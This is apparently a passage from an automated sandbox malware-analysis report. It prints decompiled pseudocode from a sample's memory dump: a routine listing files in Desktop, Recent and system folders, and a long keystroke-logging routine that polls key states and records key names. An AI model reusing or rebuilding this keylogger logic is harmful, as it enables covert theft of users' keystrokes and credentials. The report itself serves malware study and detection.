							E24013388( &_v8, 0x24040d78, _v932);
						}
					} else {
						E24016F20( &_v8, __ebx, __eflags);
					}
				} else {
					E24016FAC( &_v8, __ebx, 0);
				}
				_t88 = E2401333C(_v8);
				_t214 = _t88 - 3;
				if(_t88 < 3) {
					E24017064( &_v8, _t157, _t214);
				}
				if(E2401742C(_v8) != 0) {
					_v28 = E24012658(1);
					_v32 = E24012658(1);
					_v24 = 0;
					_push(_t209);
					_push(0x24040c93);
					_push( *[fs:eax]);
					 *[fs:eax] = _t211;
					E24013388( &_v940, 0x24040da8, _v8);
					_v24 = FindFirstFileA(E24013534(_v940),  &_v352);
					__eflags = _v24 - 0xffffffff;
					if(_v24 != 0xffffffff) {
						while(1) {
							_t108 = FindNextFileA(_v24,  &_v352);
							__eflags = _t108;
							if(_t108 == 0) {
								goto L18;
							}
							_t207 =  &_v352;
							memcpy( &_v928, _t207, 0x50 << 2);
							_t211 = _t211 + 0xc;
							_t205 = _t207 + 0xa0;
							__eflags = _v352.dwFileAttributes & 0x00000010;
							if((_v352.dwFileAttributes & 0x00000010) == 0) {
								_push( &_v1196);
								E240132EC( &_v1460, 0x104,  &(_v352.cFileName));
								E240171A8(_v1460, 0x104,  &_v1456);
								E24013318( &_v1452, 0xff, _v1456);
								_push( &_v1452);
								E240132EC( &_v1468, 0x104,  &(_v352.cFileName));
								E24013388( &_v1464, _v1468, _v8);
								__eflags = 0;
								_pop(_t189);
								E240404A4(_t157, _t189, _t205, _t207, 0);
								E24011BD8( &_v608,  &_v1196);
								E24023314(_v32, 0x240,  &_v928);
							} else {
								E24011BD8( &_v608, 0x2405cc15);
								E24023314(_v28, 0x240,  &_v928);
							}
						}
					}
					L18:
					__eflags = 0;
					_pop(_t183);
					 *[fs:eax] = _t183;
					_push(0x24040c9a);
					return FindClose(_v24);
				} else {
					E24013088(_v12);
					_pop(_t194);
					 *[fs:eax] = _t194;
					_push(0x24040d25);
					E240130AC( &_v1468, 4);
					E240130AC( &_v940, 3);
					E240130AC( &_v20, 2);
					return E24013088( &_v8);
				}
			}
































                                    0x240409e4
                                    0x240409e5
                                    0x240409e7
                                    0x240409ed
                                    0x240409f1
                                    0x240409f7
                                    0x240409fd
                                    0x24040a03
                                    0x24040a09
                                    0x24040a0f
                                    0x24040a15
                                    0x24040a1b
                                    0x24040a1e
                                    0x24040a21
                                    0x24040a24
                                    0x24040a2a
                                    0x24040a31
                                    0x24040a32
                                    0x24040a37
                                    0x24040a3a
                                    0x24040a40
                                    0x24040a4d
                                    0x24040a52
                                    0x24040a66
                                    0x24040a6b
                                    0x24040a7f
                                    0x24040a84
                                    0x24040ab3
                                    0x24040ab8
                                    0x24040ac5
                                    0x24040ad8
                                    0x24040ad8
                                    0x24040a86
                                    0x24040a91
                                    0x24040aa4
                                    0x24040aa4
                                    0x24040a6d
                                    0x24040a70
                                    0x24040a70
                                    0x24040a54
                                    0x24040a57
                                    0x24040a57
                                    0x24040ae0
                                    0x24040ae5
                                    0x24040ae8
                                    0x24040aed
                                    0x24040aed
                                    0x24040afc
                                    0x24040b17
                                    0x24040b26
                                    0x24040b2b
                                    0x24040b30
                                    0x24040b31
                                    0x24040b36
                                    0x24040b39
                                    0x24040b51
                                    0x24040b67
                                    0x24040b6a
                                    0x24040b6e
                                    0x24040c64
                                    0x24040c6f
                                    0x24040c74
                                    0x24040c76
                                    0x00000000
                                    0x00000000
                                    0x24040b79
                                    0x24040b8a
                                    0x24040b8a
                                    0x24040b8a
                                    0x24040b8c
                                    0x24040b93
                                    0x24040bc3
                                    0x24040bd5
                                    0x24040be6
                                    0x24040bfc
                                    0x24040c07
                                    0x24040c19
                                    0x24040c2d
                                    0x24040c38
                                    0x24040c3a
                                    0x24040c3b
                                    0x24040c4c
                                    0x24040c5f
                                    0x24040b95
                                    0x24040ba0
                                    0x24040bb3
                                    0x24040bb3
                                    0x24040b93
                                    0x24040c64
                                    0x24040c7c
                                    0x24040c7c
                                    0x24040c7e
                                    0x24040c81
                                    0x24040c84
                                    0x24040c92
                                    0x24040afe
                                    0x24040b01
                                    0x24040cdd
                                    0x24040ce0
                                    0x24040ce3
                                    0x24040cf3
                                    0x24040d03
                                    0x24040d10
                                    0x24040d1d
                                    0x24040d1d

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,24040C93,?,00000000,24040D1E), ref: 24040B62
                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,?,00000000,24040C93,?,00000000,24040D1E), ref: 24040C6F
                                    • FindClose.KERNEL32(000000FF,24040C9A,24040C93,?,00000000,24040D1E), ref: 24040C8D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNext
                                    • String ID: %DESKTOP%$%RECENT%$%SYS%$%WIN%$*.*$Desktop$Recent
                                    • API String ID: 3541575487-3092682246
                                    • Opcode ID: 9333198c916d2e7f6859b0549a39fb8b10b2f4c65fefd0b361ab6c507c8835a6
                                    • Instruction ID: 824e63d778eb24faf684a52e18780895a10fc9cc48681f3b93f5fc644f457a2d
                                    • Opcode Fuzzy Hash: 9333198c916d2e7f6859b0549a39fb8b10b2f4c65fefd0b361ab6c507c8835a6
                                    • Instruction Fuzzy Hash: D7812530E046199FEF11DBA4DC80A9EB7B9AF89308F5044F9A448B7248DB74AFC58F51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2405038C, Relevance: 15.3, APIs: 10, Instructions: 323keyboardCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 90%
                                    			E2405038C(void* __ebx, void* __edi, void* __esi) {
				char* _v8;
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				char* _v72;
				char* _v76;
				char* _v80;
				char* _v84;
				char* _v88;
				char* _v92;
				char* _v96;
				char* _v100;
				char* _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				char* _v156;
				char* _v160;
				char* _v164;
				char* _v168;
				char* _v172;
				char* _v176;
				char* _v180;
				char* _v184;
				char* _v188;
				char* _v192;
				char* _v196;
				char* _v200;
				char* _v204;
				char* _v208;
				char* _v212;
				char* _v216;
				char* _v220;
				char* _v224;
				char* _v228;
				char* _v232;
				char* _v236;
				char* _v240;
				char* _v244;
				char* _v248;
				char* _v252;
				char* _v256;
				char* _v260;
				char* _v264;
				char* _v268;
				char* _v272;
				char* _v276;
				char* _v280;
				char* _v284;
				char* _v288;
				char* _v292;
				char* _v296;
				char* _v300;
				char* _v304;
				char* _v308;
				char* _v312;
				char* _v316;
				char* _v320;
				char* _v324;
				char _v328;
				char _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				char _v360;
				char _v364;
				char _v368;
				char _v372;
				void* _t247;
				short _t301;
				short _t302;
				short _t317;
				short _t342;
				short _t343;
				char* _t345;
				void* _t347;
				char* _t351;
				void* _t353;
				short _t356;
				char* _t358;
				void* _t360;
				char* _t364;
				void* _t366;
				short _t370;
				char* _t372;
				void* _t374;
				char* _t378;
				void* _t380;
				char* _t385;
				void* _t387;
				void* _t397;
				void* _t398;
				intOrPtr _t427;
				intOrPtr _t444;
				intOrPtr _t446;
				intOrPtr _t448;
				intOrPtr _t450;
				intOrPtr _t452;
				intOrPtr _t454;
				intOrPtr _t456;
				intOrPtr* _t463;
				intOrPtr _t465;
				intOrPtr _t466;
				void* _t469;

				_t465 = _t466;
				_t398 = 0x2e;
				goto L1;
				while(1) {
					L3:
					_t469 = GetAsyncKeyState(0) - 0x8001;
					if(_t469 != 0) {
						goto L285;
					}
					E24013480( *_t463, 0x24051db4);
					if(_t469 != 0) {
						E24013480( *_t463, 0x24051dd8);
						if(__eflags != 0) {
							__eflags = 0xfffffffffffffff8 - 0x9d;
							if(0xfffffffffffffff8 > 0x9d) {
								L278:
								_t301 = GetKeyState(0x14);
								__eflags = _t301 - 1;
								if(_t301 != 1) {
									_t302 = GetKeyState(0x10);
									__eflags = _t302;
									if(_t302 >= 0) {
										__eflags = 0;
										E24050318(_t397,  &_v356);
										E240159CC(_v356, _t397,  &_v352, 0x240632f8, _t463, __eflags);
										E24013344(0x240632f8, _v352);
									} else {
										E24050318(_t397,  &_v348);
										E24015948(_v348, _t397,  &_v344, 0x240632f8, _t463, __eflags);
										E24013344(0x240632f8, _v344);
									}
								} else {
									_t317 = GetKeyState(0x10);
									__eflags = _t317;
									if(_t317 >= 0) {
										E24050318(_t397,  &_v340);
										E24015948(_v340, _t397,  &_v336, 0x240632f8, _t463, __eflags);
										E24013344(0x240632f8, _v336);
									} else {
										E24050318(_t397,  &_v332);
										E240159CC(_v332, _t397,  &_v328, 0x240632f8, _t463, __eflags);
										E24013344(0x240632f8, _v328);
									}
								}
								goto L285;
							}
							switch( *((intOrPtr*)( *0x240505FD * 4 +  &M240506A3))) {
								case 0:
									goto L278;
								case 1:
									__eflags =  *((char*)( *0x2405ac1c));
									if( *((char*)( *0x2405ac1c)) != 0) {
										E240135D0(0x240632f8, 1, E2401333C( *0x240632f8));
										 *0x24063300 = E2401333C( *0x240632f8);
									} else {
										E24013344(0x240632f8, "[BACKSPACE]");
									}
									goto L285;
								case 2:
									__eax = __edi;
									__edx = 0x24051e10;
									__eax = E24013344(__edi, 0x24051e10);
									goto L285;
								case 3:
									__eax = __edi;
									__edx = 0x24051e20;
									__eax = E24013344(__edi, 0x24051e20);
									goto L285;
								case 4:
									__eax = __edi;
									__edx = "(Ctrl)";
									__eax = E24013344(__edi, __edx);
									goto L285;
								case 5:
									__eax = __edi;
									__edx = "(Pause/Break)";
									__eax = E24013344(__edi, __edx);
									goto L285;
								case 6:
									__eax = __edi;
									__edx = "(Caps Lock)";
									__eax = E24013344(__edi, __edx);
									goto L285;
								case 7:
									__eax = __edi;
									__edx = 0x24051e68;
									__eax = E24013344(__edi, 0x24051e68);
									goto L285;
								case 8:
									__eax = __edi;
									__edx = 0x24051e78;
									__eax = E24013344(__edi, 0x24051e78);
									goto L285;
								case 9:
									__eax = __edi;
									__edx = "(Page up)";
									__eax = E24013344(__edi, __edx);
									goto L285;
								case 0xa:
									__eax = __edi;
									__edx = "(Page down)";
									__eax = E24013344(__edi, __edx);
									goto L285;
								case 0xb:
									__eax = __edi;
									__edx = 0x24051eac;
									__eax = E24013344(__edi, 0x24051eac);
									goto L285;
								case 0xc:
									__eax = __edi;
									__edx = "(Home)";
									__eax = E24013344(__edi, __edx);
									goto L285;
								case 0xd:
									__eax = __edi;
									__edx = "(Left)";
									__eax = E24013344(__edi, __edx);
									goto L285;
								case 0xe:
									__eax = __edi;
									__edx = 0x24051edc;
									__eax = E24013344(__edi, 0x24051edc);
									goto L285;
								case 0xf:
									__eax = __edi;
									__edx = "(Right)";
									__eax = E24013344(__edi, __edx);
									goto L285;
								case 0x10:
									__eax = __edi;
									__edx = "(Down)";
									__eax = E24013344(__edi, __edx);
									goto L285;
								case 0x11:
									__eax = __edi;
									__edx = "(Prnt Scrn)";
									__eax = E24013344(__edi, __edx);
									goto L285;
								case 0x12:
									__eax = __edi;
									__edx = "(Insert)";
									__eax = E24013344(__edi, __edx);
									goto L285;
								case 0x13:
									__eax = __edi;
									__edx = "(Delete)";
									__eax = E24013344(__edi, __edx);
									goto L285;
								case 0x14:
									__eax = __edi;
									__edx = "(Left Start)";
									__eax = E24013344(__edi, __edx);
									goto L285;
								case 0x15:
									__eax = __edi;
									__edx = "(Right Start)";
									__eax = E24013344(__edi, __edx);
									goto L285;
								case 0x16:
									__eax = __edi;
									__edx = "[Num Lock]";
									__eax = E24013344(__edi, __edx);
									goto L285;
								case 0x17:
									__eax = __edi;
									__edx = "(Scroll lock)";
									__eax = E24013344(__edi, __edx);
									goto L285;
								case 0x18:
									__eax = __edi;
									__edx = "(Left Ctrl)";
									__eax = E24013344(__edi, __edx);
									goto L285;
								case 0x19:
									__eax = __edi;
									__edx = "(Right Ctrl)";
									__eax = E24013344(__edi, __edx);
									goto L285;
								case 0x1a:
									__eax = __edi;
									__edx = 0x24051fd0;
									__eax = E24013344(__edi, 0x24051fd0);
									goto L285;
								case 0x1b:
									__eax = __edi;
									__edx = "(Alt Gr)";
									__eax = E24013344(__edi, __edx);
									goto L285;
								case 0x1c:
									__eax =  *__edi;
									__eax = E2401333C( *__edi);
									__eflags = __eax;
									if(__eax <= 0) {
										_push(0x14);
										L240152F0();
										__eflags = __ax - 1;
										if(__ax != 1) {
											_push(0x10);
											L240152F0();
											__eflags = __ax;
											if(__ax >= 0) {
												__edx =  &_v68;
												0 = E24050318(0,  &_v68);
												__eax = _v68;
												__edx =  &_v64;
												__eax = E240159CC(_v68, __ebx,  &_v64, __edi, __esi, __eflags);
												__edx = _v64;
												__eax = __edi;
												__eax = E24013344(__edi, __edx);
											} else {
												__edx =  &_v60;
												0 = E24050318(0,  &_v60);
												__eax = _v60;
												__edx =  &_v56;
												__eax = E24015948(_v60, __ebx,  &_v56, __edi, __esi, __eflags);
												__edx = _v56;
												__eax = __edi;
												__eax = E24013344(__edi, __edx);
											}
										} else {
											_push(0x10);
											L240152F0();
											__eflags = __ax;
											if(__ax >= 0) {
												__edx =  &_v52;
												0 = E24050318(0,  &_v52);
												__eax = _v52;
												__edx =  &_v48;
												__eax = E24015948(_v52, __ebx,  &_v48, __edi, __esi, __eflags);
												__edx = _v48;
												__eax = __edi;
												__eax = E24013344(__edi, __edx);
											} else {
												__edx =  &_v44;
												0 = E24050318(0,  &_v44);
												__eax = _v44;
												__edx =  &_v40;
												__eax = E240159CC(_v44, __ebx,  &_v40, __edi, __esi, __eflags);
												__edx = _v40;
												__eax = __edi;
												__eax = E24013344(__edi, __edx);
											}
										}
									} else {
										__eax =  *__edi;
										__eax = E2401333C( *__edi);
										__edx =  *__edi;
										__eflags = __edx[__eax - 1] - 0xb4;
										if(__edx[__eax - 1] != 0xb4) {
											__eax =  *__edi;
											__eax = E2401333C( *__edi);
											__edx =  *__edi;
											__eflags = __edx[__eax - 1] - 0x60;
											if(__edx[__eax - 1] != 0x60) {
												__eax =  *__edi;
												__eax = E2401333C( *__edi);
												__edx =  *__edi;
												__eflags = __edx[__eax - 1] - 0x7e;
												if(__edx[__eax - 1] != 0x7e) {
													__eax =  *__edi;
													__eax = E2401333C( *__edi);
													__edx =  *__edi;
													__eflags = __edx[__eax - 1] - 0x5e;
													if(__edx[__eax - 1] != 0x5e) {
														_push(0x14);
														L240152F0();
														__eflags = __ax - 1;
														if(__ax != 1) {
															_push(0x10);
															L240152F0();
															__eflags = __ax;
															if(__ax >= 0) {
																__edx =  &_v36;
																0 = E24050318(0,  &_v36);
																__eax = _v36;
																__edx =  &_v32;
																__eax = E240159CC(_v36, __ebx,  &_v32, __edi, __esi, __eflags);
																__edx = _v32;
																__eax = __edi;
																__eax = E24013344(__edi, __edx);
															} else {
																__edx =  &_v28;
																0 = E24050318(0,  &_v28);
																__eax = _v28;
																__edx =  &_v24;
																__eax = E24015948(_v28, __ebx,  &_v24, __edi, __esi, __eflags);
																__edx = _v24;
																__eax = __edi;
																__eax = E24013344(__edi, __edx);
															}
														} else {
															_push(0x10);
															L240152F0();
															__eflags = __ax;
															if(__ax >= 0) {
																__edx =  &_v20;
																0 = E24050318(0,  &_v20);
																__eax = _v20;
																__edx =  &_v16;
																__eax = E24015948(_v20, __ebx,  &_v16, __edi, __esi, __eflags);
																__edx = _v16;
																__eax = __edi;
																__eax = E24013344(__edi, __edx);
															} else {
																__edx =  &_v12;
																0 = E24050318(0,  &_v12);
																__eax = _v12;
																__edx =  &_v8;
																__eax = E240159CC(_v12, __ebx,  &_v8, __edi, __esi, __eflags);
																__edx = _v8;
																__eax = __edi;
																__eax = E24013344(__edi, __edx);
															}
														}
													} else {
														__eax =  *__edi;
														__edx = E2401333C( *__edi);
														__eax = __edi;
														__ecx = 1;
														__eax = E240135D0(__edi, 1, __edx);
														_push(0x14);
														L240152F0();
														__eflags = __ax - 1;
														if(__ax != 1) {
															_push(0x10);
															L240152F0();
															__eflags = __ax;
															if(__ax >= 0) {
																__eax = __edi;
																__edx = 0x2405203c;
																__eax = E24013344(__edi, 0x2405203c);
															} else {
																__eax = __edi;
																__edx = 0x24052048;
																__eax = E24013344(__edi, 0x24052048);
															}
														} else {
															_push(0x10);
															L240152F0();
															__eflags = __ax;
															if(__ax >= 0) {
																__eax = __edi;
																__edx = 0x24052048;
																__eax = E24013344(__edi, 0x24052048);
															} else {
																__eax = __edi;
																__edx = 0x2405203c;
																__eax = E24013344(__edi, 0x2405203c);
															}
														}
													}
												} else {
													__eax =  *__edi;
													__edx = E2401333C( *__edi);
													__eax = __edi;
													__ecx = 1;
													__eax = E240135D0(__edi, 1, __edx);
													_push(0x14);
													L240152F0();
													__eflags = __ax - 1;
													if(__ax != 1) {
														_push(0x10);
														L240152F0();
														__eflags = __ax;
														if(__ax >= 0) {
															__eax = __edi;
															__edx = 0x24052024;
															__eax = E24013344(__edi, 0x24052024);
														} else {
															__eax = __edi;
															__edx = 0x24052030;
															__eax = E24013344(__edi, 0x24052030);
														}
													} else {
														_push(0x10);
														L240152F0();
														__eflags = __ax;
														if(__ax >= 0) {
															__eax = __edi;
															__edx = 0x24052030;
															__eax = E24013344(__edi, 0x24052030);
														} else {
															__eax = __edi;
															__edx = 0x24052024;
															__eax = E24013344(__edi, 0x24052024);
														}
													}
												}
											} else {
												__eax =  *__edi;
												__edx = E2401333C( *__edi);
												__eax = __edi;
												__ecx = 1;
												__eax = E240135D0(__edi, 1, __edx);
												_push(0x14);
												L240152F0();
												__eflags = __ax - 1;
												if(__ax != 1) {
													_push(0x10);
													L240152F0();
													__eflags = __ax;
													if(__ax >= 0) {
														__eax = __edi;
														__edx = 0x2405200c;
														__eax = E24013344(__edi, 0x2405200c);
													} else {
														__eax = __edi;
														__edx = 0x24052018;
														__eax = E24013344(__edi, 0x24052018);
													}
												} else {
													_push(0x10);
													L240152F0();
													__eflags = __ax;
													if(__ax >= 0) {
														__eax = __edi;
														__edx = 0x24052018;
														__eax = E24013344(__edi, 0x24052018);
													} else {
														__eax = __edi;
														__edx = 0x2405200c;
														__eax = E24013344(__edi, 0x2405200c);
													}
												}
											}
										} else {
											__eax =  *__edi;
											__edx = E2401333C( *__edi);
											__eax = __edi;
											__ecx = 1;
											__eax = E240135D0(__edi, 1, __edx);
											_push(0x14);
											L240152F0();
											__eflags = __ax - 1;
											if(__ax != 1) {
												_push(0x10);
												L240152F0();
												__eflags = __ax;
												if(__ax >= 0) {
													__eax = __edi;
													__edx = 0x24051ff4;
													__eax = E24013344(__edi, 0x24051ff4);
												} else {
													__eax = __edi;
													__edx = 0x24052000;
													__eax = E24013344(__edi, 0x24052000);
												}
											} else {
												_push(0x10);
												L240152F0();
												__eflags = __ax;
												if(__ax >= 0) {
													__eax = __edi;
													__edx = 0x24052000;
													__eax = E24013344(__edi, 0x24052000);
												} else {
													__eax = __edi;
													__edx = 0x24051ff4;
													__eax = E24013344(__edi, 0x24051ff4);
												}
											}
										}
									}
									goto L285;
								case 0x1d:
									__eax =  *__edi;
									__eax = E2401333C( *__edi);
									__eflags = __eax;
									if(__eax <= 0) {
										_push(0x14);
										L240152F0();
										__eflags = __ax - 1;
										if(__ax != 1) {
											_push(0x10);
											L240152F0();
											__eflags = __ax;
											if(__ax >= 0) {
												__edx =  &_v132;
												0 = E24050318(0,  &_v132);
												__eax = _v132;
												__edx =  &_v128;
												__eax = E240159CC(_v132, __ebx,  &_v128, __edi, __esi, __eflags);
												__edx = _v128;
												__eax = __edi;
												__eax = E24013344(__edi, __edx);
											} else {
												__edx =  &_v124;
												0 = E24050318(0,  &_v124);
												__eax = _v124;
												__edx =  &_v120;
												__eax = E24015948(_v124, __ebx,  &_v120, __edi, __esi, __eflags);
												__edx = _v120;
												__eax = __edi;
												__eax = E24013344(__edi, __edx);
											}
										} else {
											_push(0x10);
											L240152F0();
											__eflags = __ax;
											if(__ax >= 0) {
												__edx =  &_v116;
												0 = E24050318(0,  &_v116);
												__eax = _v116;
												__edx =  &_v112;
												__eax = E24015948(_v116, __ebx,  &_v112, __edi, __esi, __eflags);
												__edx = _v112;
												__eax = __edi;
												__eax = E24013344(__edi, __edx);
											} else {
												__edx =  &_v108;
												0 = E24050318(0,  &_v108);
												__eax = _v108;
												__edx =  &_v104;
												__eax = E240159CC(_v108, __ebx,  &_v104, __edi, __esi, __eflags);
												__edx = _v104;
												__eax = __edi;
												__eax = E24013344(__edi, __edx);
											}
										}
									} else {
										__eax =  *__edi;
										__eax = E2401333C( *__edi);
										__edx =  *__edi;
										__eflags = __edx[__eax - 1] - 0xb4;
										if(__edx[__eax - 1] != 0xb4) {
											__eax =  *__edi;
											__eax = E2401333C( *__edi);
											__edx =  *__edi;
											__eflags = __edx[__eax - 1] - 0x60;
											if(__edx[__eax - 1] != 0x60) {
												__eax =  *__edi;
												__eax = E2401333C( *__edi);
												__edx =  *__edi;
												__eflags = __edx[__eax - 1] - 0x5e;
												if(__edx[__eax - 1] != 0x5e) {
													_push(0x14);
													L240152F0();
													__eflags = __ax - 1;
													if(__ax != 1) {
														_push(0x10);
														L240152F0();
														__eflags = __ax;
														if(__ax >= 0) {
															__edx =  &_v100;
															0 = E24050318(0,  &_v100);
															__eax = _v100;
															__edx =  &_v96;
															__eax = E240159CC(_v100, __ebx,  &_v96, __edi, __esi, __eflags);
															__edx = _v96;
															__eax = __edi;
															__eax = E24013344(__edi, __edx);
														} else {
															__edx =  &_v92;
															0 = E24050318(0,  &_v92);
															__eax = _v92;
															__edx =  &_v88;
															__eax = E24015948(_v92, __ebx,  &_v88, __edi, __esi, __eflags);
															__edx = _v88;
															__eax = __edi;
															__eax = E24013344(__edi, __edx);
														}
													} else {
														_push(0x10);
														L240152F0();
														__eflags = __ax;
														if(__ax >= 0) {
															__edx =  &_v84;
															0 = E24050318(0,  &_v84);
															__eax = _v84;
															__edx =  &_v80;
															__eax = E24015948(_v84, __ebx,  &_v80, __edi, __esi, __eflags);
															__edx = _v80;
															__eax = __edi;
															__eax = E24013344(__edi, __edx);
														} else {
															__edx =  &_v76;
															0 = E24050318(0,  &_v76);
															__eax = _v76;
															__edx =  &_v72;
															__eax = E240159CC(_v76, __ebx,  &_v72, __edi, __esi, __eflags);
															__edx = _v72;
															__eax = __edi;
															__eax = E24013344(__edi, __edx);
														}
													}
												} else {
													__eax =  *__edi;
													__edx = E2401333C( *__edi);
													__eax = __edi;
													__ecx = 1;
													__eax = E240135D0(__edi, 1, __edx);
													_push(0x14);
													L240152F0();
													__eflags = __ax - 1;
													if(__ax != 1) {
														_push(0x10);
														L240152F0();
														__eflags = __ax;
														if(__ax >= 0) {
															__eax = __edi;
															__edx = 0x24052084;
															__eax = E24013344(__edi, 0x24052084);
														} else {
															__eax = __edi;
															__edx = 0x24052090;
															__eax = E24013344(__edi, 0x24052090);
														}
													} else {
														_push(0x10);
														L240152F0();
														__eflags = __ax;
														if(__ax >= 0) {
															__eax = __edi;
															__edx = 0x24052090;
															__eax = E24013344(__edi, 0x24052090);
														} else {
															__eax = __edi;
															__edx = 0x24052084;
															__eax = E24013344(__edi, 0x24052084);
														}
													}
												}
											} else {
												__eax =  *__edi;
												__edx = E2401333C( *__edi);
												__eax = __edi;
												__ecx = 1;
												__eax = E240135D0(__edi, 1, __edx);
												_push(0x14);
												L240152F0();
												__eflags = __ax - 1;
												if(__ax != 1) {
													_push(0x10);
													L240152F0();
													__eflags = __ax;
													if(__ax >= 0) {
														__eax = __edi;
														__edx = 0x2405206c;
														__eax = E24013344(__edi, 0x2405206c);
													} else {
														__eax = __edi;
														__edx = 0x24052078;
														__eax = E24013344(__edi, 0x24052078);
													}
												} else {
													_push(0x10);
													L240152F0();
													__eflags = __ax;
													if(__ax >= 0) {
														__eax = __edi;
														__edx = 0x24052078;
														__eax = E24013344(__edi, 0x24052078);
													} else {
														__eax = __edi;
														__edx = 0x2405206c;
														__eax = E24013344(__edi, 0x2405206c);
													}
												}
											}
										} else {
											__eax =  *__edi;
											__edx = E2401333C( *__edi);
											__eax = __edi;
											__ecx = 1;
											__eax = E240135D0(__edi, 1, __edx);
											_push(0x14);
											L240152F0();
											__eflags = __ax - 1;
											if(__ax != 1) {
												_push(0x10);
												L240152F0();
												__eflags = __ax;
												if(__ax >= 0) {
													__eax = __edi;
													__edx = 0x24052054;
													__eax = E24013344(__edi, 0x24052054);
												} else {
													__eax = __edi;
													__edx = 0x24052060;
													__eax = E24013344(__edi, 0x24052060);
												}
											} else {
												_push(0x10);
												L240152F0();
												__eflags = __ax;
												if(__ax >= 0) {
													__eax = __edi;
													__edx = 0x24052060;
													__eax = E24013344(__edi, 0x24052060);
												} else {
													__eax = __edi;
													__edx = 0x24052054;
													__eax = E24013344(__edi, 0x24052054);
												}
											}
										}
									}
									goto L285;
								case 0x1e:
									__eax =  *__edi;
									__eax = E2401333C( *__edi);
									__eflags = __eax;
									if(__eax <= 0) {
										_push(0x14);
										L240152F0();
										__eflags = __ax - 1;
										if(__ax != 1) {
											_push(0x10);
											L240152F0();
											__eflags = __ax;
											if(__ax >= 0) {
												__edx =  &_v196;
												0 = E24050318(0,  &_v196);
												__eax = _v196;
												__edx =  &_v192;
												__eax = E240159CC(_v196, __ebx,  &_v192, __edi, __esi, __eflags);
												__edx = _v192;
												__eax = __edi;
												__eax = E24013344(__edi, __edx);
											} else {
												__edx =  &_v188;
												0 = E24050318(0,  &_v188);
												__eax = _v188;
												__edx =  &_v184;
												__eax = E24015948(_v188, __ebx,  &_v184, __edi, __esi, __eflags);
												__edx = _v184;
												__eax = __edi;
												__eax = E24013344(__edi, __edx);
											}
										} else {
											_push(0x10);
											L240152F0();
											__eflags = __ax;
											if(__ax >= 0) {
												__edx =  &_v180;
												0 = E24050318(0,  &_v180);
												__eax = _v180;
												__edx =  &_v176;
												__eax = E24015948(_v180, __ebx,  &_v176, __edi, __esi, __eflags);
												__edx = _v176;
												__eax = __edi;
												__eax = E24013344(__edi, __edx);
											} else {
												__edx =  &_v172;
												0 = E24050318(0,  &_v172);
												__eax = _v172;
												__edx =  &_v168;
												__eax = E240159CC(_v172, __ebx,  &_v168, __edi, __esi, __eflags);
												__edx = _v168;
												__eax = __edi;
												__eax = E24013344(__edi, __edx);
											}
										}
									} else {
										__eax =  *__edi;
										__eax = E2401333C( *__edi);
										__edx =  *__edi;
										__eflags = __edx[__eax - 1] - 0xb4;
										if(__edx[__eax - 1] != 0xb4) {
											__eax =  *__edi;
											__eax = E2401333C( *__edi);
											__edx =  *__edi;
											__eflags = __edx[__eax - 1] - 0x60;
											if(__edx[__eax - 1] != 0x60) {
												__eax =  *__edi;
												__eax = E2401333C( *__edi);
												__edx =  *__edi;
												__eflags = __edx[__eax - 1] - 0x5e;
												if(__edx[__eax - 1] != 0x5e) {
													_push(0x14);
													L240152F0();
													__eflags = __ax - 1;
													if(__ax != 1) {
														_push(0x10);
														L240152F0();
														__eflags = __ax;
														if(__ax >= 0) {
															__edx =  &_v164;
															0 = E24050318(0,  &_v164);
															__eax = _v164;
															__edx =  &_v160;
															__eax = E240159CC(_v164, __ebx,  &_v160, __edi, __esi, __eflags);
															__edx = _v160;
															__eax = __edi;
															__eax = E24013344(__edi, __edx);
														} else {
															__edx =  &_v156;
															0 = E24050318(0,  &_v156);
															__eax = _v156;
															__edx =  &_v152;
															__eax = E24015948(_v156, __ebx,  &_v152, __edi, __esi, __eflags);
															__edx = _v152;
															__eax = __edi;
															__eax = E24013344(__edi, __edx);
														}
													} else {
														_push(0x10);
														L240152F0();
														__eflags = __ax;
														if(__ax >= 0) {
															__edx =  &_v148;
															0 = E24050318(0,  &_v148);
															__eax = _v148;
															__edx =  &_v144;
															__eax = E24015948(_v148, __ebx,  &_v144, __edi, __esi, __eflags);
															__edx = _v144;
															__eax = __edi;
															__eax = E24013344(__edi, __edx);
														} else {
															__edx =  &_v140;
															0 = E24050318(0,  &_v140);
															__eax = _v140;
															__edx =  &_v136;
															__eax = E240159CC(_v140, __ebx,  &_v136, __edi, __esi, __eflags);
															__edx = _v136;
															__eax = __edi;
															__eax = E24013344(__edi, __edx);
														}
													}
												} else {
													__eax =  *__edi;
													__edx = E2401333C( *__edi);
													__eax = __edi;
													__ecx = 1;
													__eax = E240135D0(__edi, 1, __edx);
													_push(0x14);
													L240152F0();
													__eflags = __ax - 1;
													if(__ax != 1) {
														_push(0x10);
														L240152F0();
														__eflags = __ax;
														if(__ax >= 0) {
															__eax = __edi;
															__edx = 0x240520cc;
															__eax = E24013344(__edi, 0x240520cc);
														} else {
															__eax = __edi;
															__edx = 0x240520d8;
															__eax = E24013344(__edi, 0x240520d8);
														}
													} else {
														_push(0x10);
														L240152F0();
														__eflags = __ax;
														if(__ax >= 0) {
															__eax = __edi;
															__edx = 0x240520d8;
															__eax = E24013344(__edi, 0x240520d8);
														} else {
															__eax = __edi;
															__edx = 0x240520cc;
															__eax = E24013344(__edi, 0x240520cc);
														}
													}
												}
											} else {
												__eax =  *__edi;
												__edx = E2401333C( *__edi);
												__eax = __edi;
												__ecx = 1;
												__eax = E240135D0(__edi, 1, __edx);
												_push(0x14);
												L240152F0();
												__eflags = __ax - 1;
												if(__ax != 1) {
													_push(0x10);
